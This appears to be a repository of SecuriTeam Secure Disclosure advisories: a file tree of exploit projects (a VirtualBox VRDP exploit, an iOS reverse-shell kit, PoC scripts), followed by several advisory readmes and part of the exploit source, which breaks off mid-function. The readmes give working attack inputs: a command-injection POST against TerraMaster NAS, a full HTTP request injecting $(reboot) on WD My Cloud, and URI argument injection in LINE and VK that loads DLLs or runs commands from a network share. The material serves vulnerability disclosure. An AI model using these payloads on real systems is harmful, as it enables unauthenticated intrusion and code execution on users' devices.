├── SSD Advisory - 3435
└── readme.md
├── SSD Advisory - 3602
└── readme.md
├── SSD Advisory - 3674
└── readme.md
├── SSD Advisory - 3676
└── readme.md
├── SSD Advisory - 3679
└── readme.md
├── SSD Advisory - 3681
└── readme.md
├── SSD Advisory - 3685
└── readme.md
├── SSD Advisory - 3686
└── readme.md
├── SSD Advisory - 3689
└── readme.md
├── SSD Advisory - 3700
└── readme.md
├── SSD Advisory - 3723
└── readme.md
├── SSD Advisory - 3724
└── readme.md
├── SSD Advisory - 3727
└── readme.md
├── SSD Advisory - 3731
└── readme.md
├── SSD Advisory - 3736
├── exploit
│ ├── poc_vrdpexploit
│ │ ├── vrdpexploit.sln
│ │ └── vrdpexploit
│ │ │ ├── MyHGSMI.cpp
│ │ │ ├── MyMain.cpp
│ │ │ ├── MyMemoryMapper.cpp
│ │ │ ├── VBoxMPCr.cpp
│ │ │ ├── VBoxMPHGSMI.cpp
│ │ │ ├── VBoxMPWddm.cpp
│ │ │ ├── VBoxOGLgen
│ │ │ ├── NULLfuncs.c
│ │ │ ├── cr_gl.h
│ │ │ ├── cr_opcodes.h
│ │ │ ├── cr_packfunctions.h
│ │ │ ├── cropengl.def
│ │ │ ├── debug_opcodes.c
│ │ │ ├── dispatch.c
│ │ │ ├── errorspu.c
│ │ │ ├── feedbackspu.c
│ │ │ ├── feedbackspu_proto.h
│ │ │ ├── feedbackspu_state.c
│ │ │ ├── getprocaddress.c
│ │ │ ├── glloader.c
│ │ │ ├── pack_arrays_swap.c
│ │ │ ├── pack_bbox.c
│ │ │ ├── pack_bounds_swap.c
│ │ │ ├── pack_bufferobject_swap.c
│ │ │ ├── pack_client_swap.c
│ │ │ ├── pack_clipplane_swap.c
│ │ │ ├── pack_current.c
│ │ │ ├── pack_fog_swap.c
│ │ │ ├── pack_lights_swap.c
│ │ │ ├── pack_materials_swap.c
│ │ │ ├── pack_matrices_swap.c
│ │ │ ├── pack_misc_swap.c
│ │ │ ├── pack_pixels_swap.c
│ │ │ ├── pack_point_swap.c
│ │ │ ├── pack_program_swap.c
│ │ │ ├── pack_regcombiner_swap.c
│ │ │ ├── pack_stipple_swap.c
│ │ │ ├── packer.c
│ │ │ ├── packspu.c
│ │ │ ├── packspu_beginend.c
│ │ │ ├── packspu_flush.c
│ │ │ ├── packspu_get.c
│ │ │ ├── packspu_proto.h
│ │ │ ├── passthroughspu.c
│ │ │ ├── server_dispatch.c
│ │ │ ├── server_dispatch.h
│ │ │ ├── server_get.c
│ │ │ ├── server_retval.c
│ │ │ ├── server_simpleget.c
│ │ │ ├── spu_dispatch_table.h
│ │ │ ├── spuchange.c
│ │ │ ├── spucopy.c
│ │ │ ├── state
│ │ │ │ ├── cr_currentpointers.h
│ │ │ │ └── cr_statefuncs.h
│ │ │ ├── state_buffer_gen.c
│ │ │ ├── state_current_gen.c
│ │ │ ├── state_fog_gen.c
│ │ │ ├── state_get.c
│ │ │ ├── state_hint_gen.c
│ │ │ ├── state_isenabled.c
│ │ │ ├── state_lighting_gen.c
│ │ │ ├── state_line_gen.c
│ │ │ ├── state_multisample_gen.c
│ │ │ ├── state_polygon_gen.c
│ │ │ ├── state_regcombiner_gen.c
│ │ │ ├── state_viewport_gen.c
│ │ │ ├── tsfuncs.c
│ │ │ ├── unpack.c
│ │ │ ├── unpack_extend.h
│ │ │ └── windows_exports.asm
│ │ │ ├── _Constants.cpp
│ │ │ ├── iprt
│ │ │ └── nt
│ │ │ │ └── nt.h
│ │ │ ├── product-generated.h
│ │ │ ├── version-generated.h
│ │ │ ├── vrdpexploit.inf
│ │ │ ├── vrdpexploit.vcxproj
│ │ │ ├── vrdpexploit.vcxproj.filters
│ │ │ └── vrdpexploit.vcxproj.user
│ └── poc_vrdpexploit_launcher
│ │ ├── hostid_hijacker
│ │ ├── HostIdHijacker.c
│ │ ├── ReflectiveDll.c
│ │ ├── ReflectiveDllInjection.h
│ │ ├── ReflectiveLoader.c
│ │ ├── ReflectiveLoader.h
│ │ ├── Shellcode.asm
│ │ ├── hostid_hijacker.vcxproj
│ │ ├── hostid_hijacker.vcxproj.filters
│ │ └── hostid_hijacker.vcxproj.user
│ │ ├── vrdpexploit_launcher.sln
│ │ └── vrdpexploit_launcher
│ │ ├── Driver.c
│ │ ├── GetProcAddressR.c
│ │ ├── GetProcAddressR.h
│ │ ├── Inject.c
│ │ ├── LoadLibraryR.c
│ │ ├── LoadLibraryR.h
│ │ ├── Main.c
│ │ ├── Process.c
│ │ ├── ReflectiveDLLInjection.h
│ │ ├── _Constants.c
│ │ ├── vrdpexploit_launcher.vcxproj
│ │ ├── vrdpexploit_launcher.vcxproj.filters
│ │ └── vrdpexploit_launcher.vcxproj.user
└── readme.md
├── SSD Advisory - 3737
└── readme.md
├── SSD Advisory - 3743
└── readme.md
├── SSD Advisory - 3747
└── readme.md
├── SSD Advisory - 3751
└── readme.md
├── SSD Advisory - 3758
└── readme.md
├── SSD Advisory - 3759
└── readme.md
├── SSD Advisory - 3765
└── readme.md
├── SSD Advisory - 3766
└── readme.md
├── SSD Advisory - 3769
└── readme.md
├── SSD Advisory - 3778
└── readme.md
├── SSD Advisory - 3781
└── readme.md
├── SSD Advisory - 3783
└── readme.md
├── SSD Advisory - 3786
└── readme.md
├── SSD Advisory - 3796
└── readme.md
├── SSD Advisory - 3802
└── readme.md
├── SSD Advisory - 3814
└── readme.md
├── SSD Advisory - 3899
└── readme.md
├── SSD Advisory - 3904
└── readme.md
├── SSD Advisory - 3923
└── readme.md
├── SSD Advisory - 3926
└── readme.md
├── SSD Advisory - 3928
└── readme.md
├── SSD Advisory - 3944
├── powend (code)
│ ├── AppDelegate.h
│ ├── AppDelegate.m
│ ├── Assets.xcassets
│ │ ├── AppIcon.appiconset
│ │ │ └── Contents.json
│ │ └── Contents.json
│ ├── Base.lproj
│ │ ├── LaunchScreen.storyboard
│ │ └── Main.storyboard
│ ├── Info.plist
│ ├── ViewController.h
│ ├── ViewController.m
│ ├── code.h
│ ├── main.m
│ ├── mig.c
│ ├── powend.entitlements
│ └── uexploit.c
├── powend.xcodeproj
│ ├── project.pbxproj
│ ├── project.xcworkspace
│ │ ├── contents.xcworkspacedata
│ │ ├── xcshareddata
│ │ │ └── IDEWorkspaceChecks.plist
│ │ └── xcuserdata
│ │ │ └── simo.xcuserdatad
│ │ │ └── UserInterfaceState.xcuserstate
│ └── xcuserdata
│ │ └── simo.xcuserdatad
│ │ ├── xcdebugger
│ │ └── Breakpoints_v2.xcbkptlist
│ │ └── xcschemes
│ │ └── xcschememanagement.plist
├── powendTests
│ ├── Info.plist
│ └── powendTests.m
├── powendUITests
│ ├── Info.plist
│ └── powendUITests.m
└── readme.md
├── SSD Advisory - 3957
└── readme.md
├── SSD Advisory - 3980
└── readme.md
├── SSD Advisory - 3987
└── readme.md
├── SSD Advisory - 3991
├── poc.c
└── readme.md
├── SSD Advisory - 4002
├── poc.c
└── readme.md
├── SSD Advisory - 4007
├── poc
│ ├── avatar.png
│ └── poc.php
└── readme.md
├── SSD Advisory - 4033
├── poc
│ ├── id_xmss
│ └── sshd_config
└── readme.md
├── SSD Advisory - 4047
└── readme.md
├── SSD Advisory - 4066
├── poc
│ ├── IOKit.framework
│ │ └── Versions
│ │ │ └── A
│ │ │ └── IOKit
│ ├── ios_reverseshell
│ ├── iospwn_typhoonPwn_2019.xcodeproj
│ │ ├── project.pbxproj
│ │ ├── project.xcworkspace
│ │ │ ├── contents.xcworkspacedata
│ │ │ └── xcuserdata
│ │ │ │ └── aa.xcuserdatad
│ │ │ │ └── UserInterfaceState.xcuserstate
│ │ ├── xcshareddata
│ │ │ └── xcschemes
│ │ │ │ └── iospwn_typhoonPwn_2019.xcscheme
│ │ └── xcuserdata
│ │ │ └── aa.xcuserdatad
│ │ │ ├── xcdebugger
│ │ │ └── Breakpoints_v2.xcbkptlist
│ │ │ └── xcschemes
│ │ │ └── xcschememanagement.plist
│ ├── iospwn_typhoonPwn_2019
│ │ ├── ALOA_exp.c
│ │ ├── AppDelegate.h
│ │ ├── AppDelegate.m
│ │ ├── Assets.xcassets
│ │ │ ├── AppIcon.appiconset
│ │ │ │ └── Contents.json
│ │ │ └── Contents.json
│ │ ├── BNSA_exp.c
│ │ ├── Base.lproj
│ │ │ ├── LaunchScreen.storyboard
│ │ │ └── Main.storyboard
│ │ ├── IOKitKeys.h
│ │ ├── IOKitLib.h
│ │ ├── IOReturn.h
│ │ ├── IOTypes.h
│ │ ├── Info.plist
│ │ ├── OSMessageNotification.h
│ │ ├── UHAK_final_exp.c
│ │ ├── ViewController.h
│ │ ├── ViewController.m
│ │ ├── inject.h
│ │ ├── inject.m
│ │ ├── kernel_stru.h
│ │ ├── kernel_stu.c
│ │ ├── main.m
│ │ └── pwned.png
│ └── reverseShell
│ │ ├── bin
│ │ ├── bash
│ │ ├── cat
│ │ ├── chmod
│ │ ├── cp
│ │ ├── date
│ │ ├── dd
│ │ ├── df
│ │ ├── hostname
│ │ ├── kill
│ │ ├── launchctl
│ │ ├── ln
│ │ ├── ls
│ │ ├── mkdir
│ │ ├── mv
│ │ ├── ps
│ │ ├── pwd
│ │ ├── rm
│ │ ├── rmdir
│ │ ├── sh
│ │ ├── sleep
│ │ ├── stty
│ │ └── zsh
│ │ ├── etc
│ │ ├── profile
│ │ └── zshrc
│ │ ├── sbin
│ │ ├── dmesg
│ │ ├── ifconfig
│ │ ├── kextunload
│ │ ├── md5
│ │ ├── mknod
│ │ ├── ping
│ │ └── shutdown
│ │ └── usr
│ │ ├── .DS_Store
│ │ ├── bin
│ │ ├── arch
│ │ ├── chflags
│ │ ├── cut
│ │ ├── du
│ │ ├── false
│ │ ├── find
│ │ ├── fs_usage
│ │ ├── grep
│ │ ├── gunzip
│ │ ├── gzip
│ │ ├── head
│ │ ├── hexdump
│ │ ├── hostinfo
│ │ ├── id
│ │ ├── killall
│ │ ├── less
│ │ ├── login
│ │ ├── lsmp
│ │ ├── more
│ │ ├── nano
│ │ ├── nohup
│ │ ├── passwd
│ │ ├── plconvert
│ │ ├── printf
│ │ ├── renice
│ │ ├── reset
│ │ ├── sc_usage
│ │ ├── scp
│ │ ├── screen
│ │ ├── script
│ │ ├── sed
│ │ ├── seq
│ │ ├── split
│ │ ├── sqlite3
│ │ ├── stat
│ │ ├── syslog
│ │ ├── tail
│ │ ├── tar
│ │ ├── tee
│ │ ├── time
│ │ ├── true
│ │ ├── tset
│ │ ├── uname
│ │ ├── vim
│ │ ├── vm_stat
│ │ ├── wc
│ │ ├── what
│ │ ├── which
│ │ ├── xargs
│ │ └── xxd
│ │ ├── local
│ │ ├── .DS_Store
│ │ ├── bin
│ │ │ ├── dbclient
│ │ │ ├── dropbear
│ │ │ ├── dropbearconvert
│ │ │ ├── dropbearkey
│ │ │ ├── filemon
│ │ │ ├── jtool
│ │ │ ├── procexp
│ │ │ └── wget
│ │ └── lib
│ │ │ ├── .DS_Store
│ │ │ └── zsh
│ │ │ ├── .DS_Store
│ │ │ └── 5.0.8
│ │ │ ├── .DS_Store
│ │ │ └── zsh
│ │ │ ├── attr.so
│ │ │ ├── cap.so
│ │ │ ├── clone.so
│ │ │ ├── compctl.so
│ │ │ ├── complete.so
│ │ │ ├── complist.so
│ │ │ ├── computil.so
│ │ │ ├── curses.so
│ │ │ ├── datetime.so
│ │ │ ├── deltochar.so
│ │ │ ├── example.so
│ │ │ ├── files.so
│ │ │ ├── langinfo.so
│ │ │ ├── mapfile.so
│ │ │ ├── mathfunc.so
│ │ │ ├── newuser.so
│ │ │ ├── parameter.so
│ │ │ ├── regex.so
│ │ │ ├── socket.so
│ │ │ ├── stat.so
│ │ │ ├── system.so
│ │ │ ├── tcp.so
│ │ │ ├── termcap.so
│ │ │ ├── terminfo.so
│ │ │ ├── zftp.so
│ │ │ ├── zle.so
│ │ │ ├── zleparameter.so
│ │ │ ├── zprof.so
│ │ │ ├── zpty.so
│ │ │ ├── zselect.so
│ │ │ └── zutil.so
│ │ ├── sbin
│ │ ├── chown
│ │ ├── ioreg
│ │ ├── kextstat
│ │ ├── ltop
│ │ ├── netstat
│ │ ├── nvram
│ │ ├── sysctl
│ │ └── taskpolicy
│ │ └── share
│ │ ├── .DS_Store
│ │ └── terminfo
│ │ ├── 61
│ │ ├── ansi
│ │ ├── ansi+arrows
│ │ ├── ansi+csr
│ │ ├── ansi+cup
│ │ ├── ansi+enq
│ │ ├── ansi+erase
│ │ ├── ansi+idc
│ │ ├── ansi+idl
│ │ ├── ansi+idl1
│ │ ├── ansi+inittabs
│ │ ├── ansi+local
│ │ ├── ansi+local1
│ │ ├── ansi+pp
│ │ ├── ansi+rca
│ │ ├── ansi+rep
│ │ ├── ansi+sgr
│ │ ├── ansi+sgrbold
│ │ ├── ansi+sgrdim
│ │ ├── ansi+sgrso
│ │ ├── ansi+sgrul
│ │ ├── ansi+tabs
│ │ ├── ansi-color-2-emx
│ │ ├── ansi-color-3-emx
│ │ ├── ansi-emx
│ │ ├── ansi-generic
│ │ ├── ansi-m
│ │ ├── ansi-mini
│ │ ├── ansi-mono
│ │ ├── ansi-mr
│ │ ├── ansi-mtabs
│ │ ├── ansi-nt
│ │ ├── ansi.sys
│ │ ├── ansi.sys-old
│ │ ├── ansi.sysk
│ │ ├── ansi43m
│ │ ├── ansi77
│ │ ├── ansi80x25
│ │ ├── ansi80x25-mono
│ │ ├── ansi80x25-raw
│ │ ├── ansi80x30
│ │ ├── ansi80x30-mono
│ │ ├── ansi80x43
│ │ ├── ansi80x43-mono
│ │ ├── ansi80x50
│ │ ├── ansi80x50-mono
│ │ ├── ansi80x60
│ │ ├── ansi80x60-mono
│ │ ├── ansil
│ │ ├── ansil-mono
│ │ ├── ansis
│ │ ├── ansis-mono
│ │ ├── ansisysk
│ │ └── ansiw
│ │ ├── 73
│ │ ├── screen
│ │ ├── screen+fkeys
│ │ ├── screen-16color
│ │ ├── screen-16color-bce
│ │ ├── screen-16color-bce-s
│ │ ├── screen-16color-s
│ │ ├── screen-256color
│ │ ├── screen-256color-bce
│ │ ├── screen-256color-bce-s
│ │ ├── screen-256color-s
│ │ ├── screen-bce
│ │ ├── screen-s
│ │ ├── screen-w
│ │ ├── screen.linux
│ │ ├── screen.mlterm
│ │ ├── screen.rxvt
│ │ ├── screen.teraterm
│ │ ├── screen.xterm-new
│ │ ├── screen.xterm-r6
│ │ ├── screen.xterm-xfree86
│ │ ├── screen2
│ │ └── screen3
│ │ ├── 76
│ │ ├── vt100
│ │ ├── vt100+
│ │ ├── vt100+enq
│ │ ├── vt100+fnkeys
│ │ ├── vt100+keypad
│ │ ├── vt100+pfkeys
│ │ ├── vt100-am
│ │ ├── vt100-bm
│ │ ├── vt100-bm-o
│ │ ├── vt100-bot-s
│ │ ├── vt100-nam
│ │ ├── vt100-nam-w
│ │ ├── vt100-nav
│ │ ├── vt100-nav-w
│ │ ├── vt100-putty
│ │ ├── vt100-s
│ │ ├── vt100-s-bot
│ │ ├── vt100-s-top
│ │ ├── vt100-top-s
│ │ ├── vt100-vb
│ │ ├── vt100-w
│ │ ├── vt100-w-am
│ │ ├── vt100-w-nam
│ │ ├── vt100-w-nav
│ │ └── vt100nam
│ │ ├── 78
│ │ └── xterm-256color
│ │ ├── .DS_Store
│ │ └── 6c
│ │ ├── linux
│ │ ├── linux-basic
│ │ ├── linux-c
│ │ ├── linux-c-nc
│ │ ├── linux-koi8
│ │ ├── linux-koi8r
│ │ ├── linux-lat
│ │ ├── linux-m
│ │ ├── linux-nic
│ │ ├── linux-vt
│ │ └── linux2.6.26
└── readme.md
├── SSD Advisory - 4099
└── readme.md
├── SSD Advisory - 4100
├── POC
│ └── Invoke-ExploitAnyConnectPathTraversal.psm1
└── readme.md
├── SSD Advisory - 4147
├── POC
│ ├── build.sh
│ ├── fake_cryptodev.h
│ ├── hack.c
│ ├── package.sh
│ ├── spray.c
│ ├── spray.h
│ └── test.sh
└── readme.md
├── SSD Advisory – 3915
└── readme.md
├── license.md
└── readme.md
/SSD Advisory - 3602/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | The following advisory describes a unauthenticated remote command execution found in TerraMaster TOS 3.0.33.
3 | TOS is a “Linux platform-based operating system developed for TerraMaster cloud storage NAS server. TOS 3 is the third generation operating system newly launched.”
4 |
5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
7 |
8 | **Vendor response**
9 | The vendor stated that version 3.1.03 of TerraMaster TOS is no longer vulnerable to this vulnerability, the latest version of the software can be obtained from: http://download.terra-master.com/download.php.
10 |
11 | **Vulnerability details**
12 | User controlled input is not sufficiently filtered and unauthenticated user can execute commands as root by sending a POST request to http://IP/include/ajax/GetTest.php with the following parameters:
13 |
14 | * dev=1
15 | * testtype=;COMMAND-TO-RUN;
16 | * submit=Send
17 |
18 | We can see in the source code that the value of parameter testtype will assign to $line and will execute by shell_exec()
19 |
20 | ```php
21 | $file = "/mnt/base/.".basename($data['dev'])."test";
22 | if(!file_exists($file)) touch($file);
23 | if(isset($data['testtype'])){//开始或者停止过程...
24 | if($data['testtype'] != 'stop'){
25 | $line = $data['dev'].':'.$data['testtype'].":".time();
26 | shell_exec("echo -e \"".$line."\" > $file");
27 | }
28 | $return = smartscan($data['dev'],$data['testtype']);
29 | }else{//得到状态过程...
30 | $return = smartscan($data['dev']);
31 | }
32 | ```
33 |
34 | **Proof of Concept**
35 | ```html
36 |
41 | ```
42 |
--------------------------------------------------------------------------------
/SSD Advisory - 3674/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | The following describes a vulnerability in VK Messenger that is triggered via the exploitation of improperly handled URI.
3 | VK (VKontakte; [..], meaning InContact) is “an online social media and social networking service. It is available in several languages. VK allows users to message each other publicly or privately, to create groups, public pages and events, share and tag images, audio and video, and to play browser-based games. It is based in Saint Petersburg, Russia”.
4 |
5 | **Credit**
6 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
7 |
8 | **Affected Version**
9 | VK Messenger version 3.1.0.143
10 |
11 | **Vendor Response**
12 | The vendor responded that the problem no longer affects the latest version – but didn’t provide any information on when it was fixed and whether it was fixed due to someone else reporting this vulnerability.
13 |
14 | **Vulnerability Details**
15 | The VK Messenger, which is part of the VK package, registers a uri handler on Windows in the following way:
16 |
17 | ```
18 | [HKEY_CLASSES_ROOT\vk]
19 | "URL Protocol"=""
20 | @="URL:vk"
21 | [HKEY_CLASSES_ROOT\vk\shell]
22 | [HKEY_CLASSES_ROOT\vk\shell\open]
23 | [HKEY_CLASSES_ROOT\vk\shell\open\command]
24 | @="\"C:\\Program Files\\VK\\vk.exe\" \"%1\""
25 | ```
26 |
27 | When the browser processes the `vk://` uri handler it is possible to inject arbitrary command line parameters for vk.exe, since the application does not properly parse them. It is possible to inject the ‘–gpu-launcher=’ parameter to execute arbitrary commands. It is also possible to inject the ‘–browser-subprocess-path=’ parameter to execute arbitrary commands. Network share paths are allowed, too.
28 | Example of attack encoded in HTML entity:
29 |
30 | ``
31 |
32 | When opening a malicious page, a notification box asks the user to open VK.
33 | NOTE: The application is not in the auto-startup items, and the issue will work if the application is not already started.
34 |
--------------------------------------------------------------------------------
/SSD Advisory - 3679/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | A vulnerability in the Western Digital My Cloud Pro Series PR2100 allows authenticated users to execute commands arbitrary commands.
3 |
4 | **Credit**
5 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
6 |
7 | **Vendor Response**
8 | The vendor was notified on the 28th of November 2017, and responded that they take security seriously and will be fixing this vulnerability promptly, repeated attempts to get a timeline or fix failed, the last update received from them was on the 31st of Jan 2018, no further emails sent to the vendor were responded. We are not aware of any fix or remediation for this vulnerability.
9 |
10 | **Vulnerability Details**
11 | In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for HTTP basic and HTTP digest login types.
12 | Log into the web application using a low privilege user, once the main page loads, find in burp proxy history for a request to `/cgi-bin/home_mgr.cgi`
13 |
14 | ```
15 | POST /cgi-bin/home_mgr.cgi HTTP/1.1
16 | Host: 10.10.10.193
17 | Content-Length: 25
18 | Accept: application/xml, text/xml, */*; q=0.01
19 | Origin: http://10.10.10.193
20 | X-Requested-With: XMLHttpRequest
21 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36
22 | (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
23 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
24 | Referer: http://10.10.10.193/
25 | Accept-Language: ko,en-US;q=0.8,ko-KR;q=0.6,en;q=0.4
26 | Cookie: PHPSESSID=650fda9b5fe3a35a5315d85bf929b247; fw_version=2.30.165; usern
27 | ame=abcd; local_login=1; isAdmin=0
28 | Connection: close
29 | cmd=7&f_user=abcd$(reboot)
30 | ```
31 |
32 | The last line can be replaced with:
33 | `cmd=7&f_user=abcd$(ping x.x.x.x)`
34 |
35 | Or:
36 | `cmd=7&f_user=abcd$(mkdir /tmp/nshctest)`
37 |
38 | This means you can run any Linux command and it would execute. But there will be no feedback in the response.
39 |
--------------------------------------------------------------------------------
/SSD Advisory - 3724/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerabilities Summary**
2 | LINE for Windows provided by LINE Corporation specifies the path to read DLL when launching software. A user clicking on a specially crafted link, can use this vulnerability to cause the user to insecurely load an arbitrary DLL which can be used to cause arbitrary code execution.
3 |
4 | **Vendor Response**
5 | “We released version 5.8.0 of the modified version LINE PC version (Windows version) on May 31, 2018, and we have automatically updated for all users. The update will be applied automatically on the system side when using the product. Also, when installing the LINE PC version (Windows version) from now on please use the latest installer”.
6 |
7 | **CVE**
8 | CVE-2018-0609
9 |
10 | **Credit**
11 | An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
12 |
13 | **Affected systems**
14 | LINE for Windows before version 5.8.0
15 |
16 | **Vulnerability Details**
17 | When processing a ‘line:’ or ‘lineb:’ URI’s it is possible to pass arbitrary command line parameters to LINE.exe, given that the application does not properly parse the mentioned URI ‘scheme:’. In addition, the ‘-platformpluginpath’ parameter supports network share paths. Using this parameter an attacker can cause the application to remotely load a Qt (https://www.qt.io/) DLL library from the network share, found inside the sub-path /imageformats.
18 |
19 | **PoC**
20 |
21 | ```html
22 | contact me
23 | contact me 2
24 | ```
25 |
26 | It works with an iframe too.
27 |
28 | ```html
29 |
30 | ```
31 |
32 | It could be also exploited locally through an .url ‘file:’, for example, creating an internet shortcut file with the next content:
33 |
34 | ```batch
35 | [InternetShortcut]
36 | URL=line://?" -platformpluginpath \\192.168.0.1\uncshare --
37 | ```
38 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27130.2027
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit", "vrdpexploit\vrdpexploit.vcxproj", "{93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|ARM = Debug|ARM
11 | Debug|ARM64 = Debug|ARM64
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|ARM = Release|ARM
15 | Release|ARM64 = Release|ARM64
16 | Release|x64 = Release|x64
17 | Release|x86 = Release|x86
18 | EndGlobalSection
19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
20 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.ActiveCfg = Debug|ARM
21 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Build.0 = Debug|ARM
22 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM.Deploy.0 = Debug|ARM
23 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.ActiveCfg = Debug|ARM64
24 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Build.0 = Debug|ARM64
25 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|ARM64.Deploy.0 = Debug|ARM64
26 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.ActiveCfg = Debug|x64
27 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Build.0 = Debug|x64
28 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x64.Deploy.0 = Debug|x64
29 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.ActiveCfg = Debug|x64
30 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Build.0 = Debug|x64
31 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Debug|x86.Deploy.0 = Debug|x64
32 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.ActiveCfg = Release|ARM
33 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Build.0 = Release|ARM
34 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM.Deploy.0 = Release|ARM
35 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.ActiveCfg = Release|ARM64
36 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Build.0 = Release|ARM64
37 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|ARM64.Deploy.0 = Release|ARM64
38 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.ActiveCfg = Release|x64
39 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Build.0 = Release|x64
40 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x64.Deploy.0 = Release|x64
41 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.ActiveCfg = Release|Win32
42 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Build.0 = Release|Win32
43 | {93F7975B-CEE1-4A2D-A1EA-BEF01A2E4A07}.Release|x86.Deploy.0 = Release|Win32
44 | EndGlobalSection
45 | GlobalSection(SolutionProperties) = preSolution
46 | HideSolutionNode = FALSE
47 | EndGlobalSection
48 | GlobalSection(ExtensibilityGlobals) = postSolution
49 | SolutionGuid = {9CAAF34D-70C5-431B-BB32-47E116148B13}
50 | EndGlobalSection
51 | EndGlobal
52 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/MyMemoryMapper.cpp:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | NTSTATUS
4 | MyMapPhysicalToVirtual(PVOID* virtOut, PHYSICAL_ADDRESS phys, PHYSICAL_ADDRESS physLen) {
5 | NTSTATUS Status = STATUS_UNSUCCESSFUL;
6 | UNICODE_STRING unicodeStr;
7 | OBJECT_ATTRIBUTES objAttr;
8 | HANDLE physMemHandle;
9 |
10 | RtlInitUnicodeString(&unicodeStr, L"\\Device\\PhysicalMemory");
11 | InitializeObjectAttributes(
12 | &objAttr,
13 | &unicodeStr,
14 | OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
15 | (HANDLE)NULL,
16 | (PSECURITY_DESCRIPTOR)NULL);
17 |
18 | // Open a handle to the physical-memory section object.
19 | if ((Status = ZwOpenSection(&physMemHandle, SECTION_ALL_ACCESS, &objAttr)) != STATUS_SUCCESS) {
20 | return Status;
21 | }
22 |
23 | PVOID virt = NULL;
24 | Status = ZwMapViewOfSection(
25 | physMemHandle,
26 | NtCurrentProcess(),
27 | &virt,
28 | 0L,
29 | (ULONG_PTR)physLen.QuadPart,
30 | &phys,
31 | (PULONG_PTR)(&(physLen.QuadPart)),
32 | ViewUnmap,
33 | 0,
34 | PAGE_READWRITE | PAGE_WRITECOMBINE);
35 | if (Status != STATUS_SUCCESS) {
36 | return Status;
37 | }
38 |
39 | *virtOut = virt;
40 | ZwClose(physMemHandle);
41 | return STATUS_SUCCESS;
42 | }
43 |
44 | NTSTATUS
45 | MyUnmapVirtual(PVOID virt) {
46 | return ZwUnmapViewOfSection(NtCurrentProcess(), virt);
47 | }
48 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/VBoxOGLgen/pack_bounds_swap.c:
--------------------------------------------------------------------------------
1 | /* THIS FILE IS AUTOGENERATED FROM E:/home/src/VirtualBox/src/VBox/GuestHost/OpenGL/packer/pack_bounds.c BY pack_swap.py */
2 |
3 |
4 | /* Copyright (c) 2001, Stanford University
5 | * All rights reserved
6 | *
7 | * See the file LICENSE.txt for information on redistributing this software.
8 | */
9 |
10 | #include "packer.h"
11 | #include "cr_opcodes.h"
12 | #include "cr_mem.h"
13 |
14 | void PACK_APIENTRY crPackBoundsInfoCRSWAP( CR_PACKER_CONTEXT_ARGDECL const CRrecti *bounds, const GLbyte *payload, GLint len, GLint num_opcodes )
15 | {
16 | CR_GET_PACKER_CONTEXT(pc);
17 | /* Don't get the buffered_ptr here because we've already
18 | * verified that there's enough space for everything. */
19 |
20 | unsigned char *data_ptr;
21 | int len_aligned, total_len;
22 |
23 | CR_LOCK_PACKER_CONTEXT(pc);
24 |
25 | data_ptr = pc->buffer.data_current;
